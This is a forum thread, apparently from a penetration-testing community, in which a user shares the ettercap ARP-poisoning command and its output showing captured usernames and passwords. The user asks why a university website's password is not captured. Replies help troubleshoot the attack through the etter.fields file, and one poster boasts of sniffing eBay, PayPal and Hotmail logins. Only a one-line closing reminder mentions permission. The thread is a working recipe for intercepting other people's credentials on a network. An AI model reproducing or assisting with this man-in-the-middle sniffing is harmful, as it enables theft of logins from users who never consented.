(i hope this is in the right section)

there's this particular website (of my uni) that i cant seem to get a proper output from it... (refer to below)

Listening on eth0... (Ethernet)

eth0 -> 00:0C:76:5F:E0:7A 192.168.1.3 255.255.255.0

Privileges dropped to UID 0 GID 65534...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
3 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating autoadd plugin...

HTTP : 64.233.189.147:443 -> USER: sdfasd PASS: sadgfasgd INFO: (cant show url pls see the attached file)
HTTP : 202.186.16.36:80 -> USER: 4203577 PASS: INFO: (cant show url pls see the attached file)
HTTP : 8.5.0.128:80 -> USER: ddfgdg@sdgsd.dfdg PASS: sdfgdsfgs INFO: (cant show url pls see the attached file)
Closing text interface...

ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.

i tried this on my own lan network at home and logged in those sites from another computer, and as u can see, the other two can sniff out the username and password properly, but the PASS is missing from the 2nd one...

is it a problem with the encoding? (i run: ettercap -Tq -M arp:remote -m /home/phailure/Desktop/asdfgh.txt // // -P autoadd)

......is it a problem with the encoding? (i run: ettercap -Tq -M arp:remote -m /home/phailure/Desktop/asdfgh.txt // // -P autoadd)

Aside from the "// //"s nothing out of the ordinary, I run the same command.

I don't get a pass either :confused: I'll do a bit of digging around and see if I can't figure it out for ya. But please, don't quit researching the problem for yourself of course :)

It may have something to do with the actual PASS field that is being sent to the remote site. Find out if that's the case by comparing the field's name and the entries in your etter.fields file.

That's one possibility I can think of off the top of my head......

initially, i thought it would be the encoding used, since it might be a hash and cannot be displayed... i changed the encoding to utf8 but still not working...

i havent checked the fields file yet... will see what to do..

There shouldn't be a problem with any pages you browse or sniff, as I have demonstrated in THIS POST (http://forums.remote-exploit.org/showpost.php?p=77223&postcount=19)

I have also tested this with the likes of ebay, paypal, hotmail & it reveals the lot.... spooky I know Obviously I didnt record me using my paypal



there's this particular website (of my uni) that i cant seem to get a proper output from it... (refer to below)

Please note that you must have permission to be doing these tests..!